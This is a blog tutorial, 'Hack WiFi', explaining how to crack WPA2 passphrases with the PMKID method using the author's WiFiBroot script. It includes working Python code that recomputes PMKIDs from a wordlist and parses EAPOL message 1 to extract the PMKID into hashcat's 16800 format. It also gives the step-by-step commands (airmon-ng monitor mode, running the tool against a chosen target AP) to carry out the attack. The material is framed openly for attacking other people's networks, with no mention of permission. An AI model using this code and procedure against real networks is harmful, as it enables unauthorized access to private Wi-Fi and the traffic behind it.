Hack WiFi: How to Crack WPA2 without handshake, new PMKID method

by hash3liZer . 20 August 2018


I last wrote a tutorial about cracking WPA2 using PMKID, a newly discovered method by Jens Steube that was added to his tool hashcat. What is special about this method is that an attacker no longer needs to capture the 4-way handshake. The first message of the 4-way handshake can carry a field called PMKID, which is derived from the Pairwise Master Key (PMK) and can be used as a medium to crack the password in the same way we do with the MIC.

PMKID is an identifier for the PMK, derived as follows:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

That is, it is an HMAC with the derived PMK as the key and the concatenation of the fixed string "PMK Name" and the MACs of the AP and the client as the data, truncated to 128 bits. Because the PMK itself is derived from the passphrase and the SSID, every different password yields a different PMKID, which can be cracked by trial just as the MIC is in the handshake method.

This method is a bit quicker, since we skip computing the PTK (Pairwise Transient Key) and the MIC for every candidate, and it is more reliable: no client has to be present or deauthenticated. The attacker only has to complete open authentication and association with the Access Point, which makes the AP send the first EAPOL message, and that message carries the PMKID. One caveat: the AP has to include the PMKID in that message, which depends on its chipset and driver; not every AP does.
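The derivation just described, worked through in Python as an added example (this is not code from the post or from WiFiBroot): the PMK comes from the passphrase and SSID via PBKDF2-HMAC-SHA1, the PMKID is HMAC-SHA1 keyed with the PMK over "PMK Name" | MAC_AP | MAC_STA truncated to 16 bytes, and a dictionary loop recomputes the PMKID per candidate and compares it with the captured one. The SSID, MAC addresses, passphrase and wordlist are constructed for the demo.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed demo values (not from the post): a target SSID, its AP MAC and the
# MAC of the station that authenticated (in the PMKID attack that is the attacker).
SSID = "TestNet"
MAC_AP = bytes.fromhex("00112233aabb")
MAC_STA = bytes.fromhex("66778899ccdd")


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted with the
    SSID, 4096 iterations, 32 bytes. This is the slow step a cracker repeats per word."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA): HMAC-SHA1 keyed
    with the PMK over the fixed string and both MACs, truncated to the first 16 bytes."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def crack_pmkid(pmkid: bytes, ssid: str, mac_ap: bytes, mac_sta: bytes,
                wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: recompute the PMKID for each candidate passphrase and compare.
    No PTK and no MIC are needed, which is why this is cheaper than the handshake method."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:  # WPA passphrases are 8..63 characters
            continue
        pmk = derive_pmk(candidate, ssid)
        if hmac.compare_digest(compute_pmkid(pmk, mac_ap, mac_sta), pmkid):
            return candidate
    return None


def demo() -> Optional[str]:
    # Pretend the AP's first EAPOL message revealed this PMKID (constructed: we derive
    # it ourselves from a known passphrase so the example is self-contained).
    captured = compute_pmkid(derive_pmk("letmein123", SSID), MAC_AP, MAC_STA)
    wordlist = ["password", "12345678", "letmein123", "qwertyui"]
    return crack_pmkid(captured, SSID, MAC_AP, MAC_STA, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Because the SSID salts the PBKDF2 step, the PMK, and therefore the PMKID, is per-network: a wordlist has to be run again for every SSID, and a GPU cracker spends almost all of its time in derive_pmk, not in the HMAC.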

With all of the above in mind, I had some shortcomings with hashcat; in particular, I don't have an Alfa adapter. So I did some research and added this new cracking method to my script, which I would like to share with you. You'll see in a few steps why I've written all of this again instead of just doing it in a shell script.


Cloning and Interface

Clone into the repository with git clone and move to the directory:

$ git clone https://github.com/hash3liZer/WiFiBroot.git
$ cd WiFiBroot/

WiFiBroot heavily depends on scapy, which is a packet manipulation module and an extensive networking library. So, install scapy with pip:

$ pip install scapy

Next, put your wireless card in monitor mode. Any adapter that supports monitor mode and packet injection will do; there is no special need for an Alfa adapter, just make sure you are close enough to your target:

$ airmon-ng start wlan1


Kick-Start WiFiBroot

WiFiBroot supports two running modes: mode 1 is the handshake method, and mode 2, just added to the script, uses the PMKID to crack the key. Kick-start WiFiBroot:

$ python wifibroot.py -i wlan1mon -m 2 --dictionary /path/to/wordlist --verbose
  • -m, --mode: Mode to use. Possible values: 1, 2
(screenshot: WiFiBroot running in mode 2)

This starts scanning the area for available networks. When your target shows up on screen, press CTRL+C to stop the scan and continue. Then enter your target's number as shown on the left side of the console:

(screenshot: console output of the network scan)


Wait for the EAPOL

What happens next is almost fully automated. You just have to wait for a successful authentication and association with the Access Point (AP). As soon as the AP sends the first EAPOL message to the STA, the script looks for the PMKID field; if it is present and not all zeros, it attempts to crack the key using the dictionary provided:
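The check described above, as an added example that is not WiFiBroot's code: parse the EAPOL-Key frame the AP sends as message 1, confirm from the Key Information field that it really is message 1, walk the key data for the RSN PMKID KDE (OUI 00:0f:ac, data type 4) and reject an all-zero PMKID. The frame is produced by a helper from constructed values rather than taken from a capture; the field layout and offsets are those of the 802.11 EAPOL-Key descriptor, and the last function emits the line in hashcat's 16800 input format (PMKID*MAC_AP*MAC_STA*SSID as hex).

```python
import struct
from typing import Optional

RSN_OUI = bytes.fromhex("000fac")
PMKID_KDE_TYPE = 4          # data type of the PMKID KDE inside key data
EAPOL_KEY = 3               # 802.1X packet type for EAPOL-Key
RSN_DESCRIPTOR = 2          # key descriptor type for RSN (WPA2)
KEY_INFO_PAIRWISE = 0x0008
KEY_INFO_INSTALL = 0x0040
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
# descriptor(1)+info(2)+len(2)+replay(8)+nonce(32)+IV(16)+RSC(8)+ID(8)+MIC(16)
KEY_DATA_LEN_OFFSET = 93


def build_eapol_m1(pmkid: bytes, replay_counter: int = 1, anonce: bytes = bytes(32)) -> bytes:
    """Constructed message 1 of the 4-way handshake, starting at the 802.1X header
    (what follows the LLC/SNAP header in the data frame). Sample input only."""
    key_data = bytes([0xDD, 4 + len(pmkid)]) + RSN_OUI + bytes([PMKID_KDE_TYPE]) + pmkid
    key_info = 0x0002 | KEY_INFO_PAIRWISE | KEY_INFO_ACK  # version 2 (HMAC-SHA1/AES), pairwise, ACK
    body = (struct.pack(">BHHQ", RSN_DESCRIPTOR, key_info, 16, replay_counter)
            + anonce + bytes(16) + bytes(8) + bytes(8) + bytes(16)  # IV, RSC, ID, MIC: zero in M1
            + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 2, EAPOL_KEY, len(body)) + body


def extract_pmkid(eapol: bytes) -> Optional[bytes]:
    """Return the PMKID carried in an EAPOL-Key message 1, or None if the frame is not
    message 1, carries no PMKID KDE, or the PMKID is all zeros (some APs send that)."""
    if len(eapol) < 4 or eapol[1] != EAPOL_KEY:
        return None
    body_len = struct.unpack(">H", eapol[2:4])[0]
    body = eapol[4:4 + body_len]
    if len(body) < KEY_DATA_LEN_OFFSET + 2 or body[0] != RSN_DESCRIPTOR:
        return None
    key_info = struct.unpack(">H", body[1:3])[0]
    # Message 1: Pairwise and ACK set, MIC and Install clear
    wanted = KEY_INFO_PAIRWISE | KEY_INFO_ACK
    if key_info & wanted != wanted or key_info & (KEY_INFO_MIC | KEY_INFO_INSTALL):
        return None
    kd_len = struct.unpack(">H", body[KEY_DATA_LEN_OFFSET:KEY_DATA_LEN_OFFSET + 2])[0]
    key_data = body[KEY_DATA_LEN_OFFSET + 2:KEY_DATA_LEN_OFFSET + 2 + kd_len]
    off = 0
    while off + 2 <= len(key_data):  # walk the TLV list of KDEs
        kde_type, kde_len = key_data[off], key_data[off + 1]
        value = key_data[off + 2:off + 2 + kde_len]
        if (kde_type == 0xDD and kde_len >= 4
                and value[:3] == RSN_OUI and value[3] == PMKID_KDE_TYPE):
            pmkid = value[4:]
            # an all-zero PMKID is useless for cracking; treat it as absent
            return pmkid if len(pmkid) == 16 and any(pmkid) else None
        off += 2 + kde_len
    return None


def hashcat_16800_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """hashcat -m 16800 input: PMKID*MAC_AP*MAC_STA*SSID(hex), lowercase hex, no colons."""
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), ssid.encode().hex()])


if __name__ == "__main__":
    # constructed PMKID and MACs, not from a real network
    frame = build_eapol_m1(bytes(range(16)))
    found = extract_pmkid(frame)
    if found is not None:
        print(hashcat_16800_line(found, bytes.fromhex("00112233aabb"),
                                 bytes.fromhex("66778899ccdd"), "TestNet"))
```

The Key Information test matters in practice: messages 2 and 3 also carry key data, and message 3 may carry KDEs of its own, so filtering on "Pairwise and ACK set, MIC clear" is what pins the parser to the AP's first message. Any PMKID the parser returns can be handed to hashcat in the 16800 format or to the dictionary loop shown earlier.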


You can see the following events happening in series:

  • Open Authentication
  • Association
  • 4-way handshake

Here, we got the PMKID:




Once the PMKID has been captured, the cracking process starts and, if the passphrase is found in the dictionary, prints it; in verbose mode it also prints the hashes involved, namely the PMKID and the PMK:

(screenshot: cracked passphrase)


Today we saw how to use WiFiBroot to crack WPA2 passwords with a newly discovered method, thanks to Jens Steube. An attacker no longer needs to capture a handshake, only an AP that includes the PMKID in its first EAPOL message. For the record, only WPA2 is affected; in the case of WPA, a handshake is still required.